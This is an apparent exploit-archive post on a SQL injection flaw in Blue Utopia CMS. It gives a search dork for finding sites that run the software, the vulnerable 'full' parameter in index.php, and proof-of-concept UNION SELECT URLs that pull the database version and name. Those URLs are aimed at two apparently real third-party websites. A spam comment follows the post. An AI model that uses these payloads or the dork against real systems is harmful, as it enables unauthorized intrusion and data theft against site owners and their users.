Blue Utopia CMS SQLi Vulnerability

[o] Blue Utopia CMS SQL Injection Vulnerability

Software : Blue Utopia CMS
Vendor : http://blueutopia.com/
Dork : "Powered by Blue Utopia"
Author : NoGe


[o] Exploit

http://localhost/[path]/index.php?page=news&full=[SQLi}


[o] PoC

http://www.geaugadems.org/index.php?page=news&full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
http://buetowforschoolboard.com/index.php?page=news&full=-2+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--


[o] Note

this is a private script
all in one server
vendor already notified
bug has been fixed by vendor! :))

One Response so far.

  1. Thanks for another informative site. Where else could I get that type of information written in such an ideal way like this post.This post is really good.
    guarantees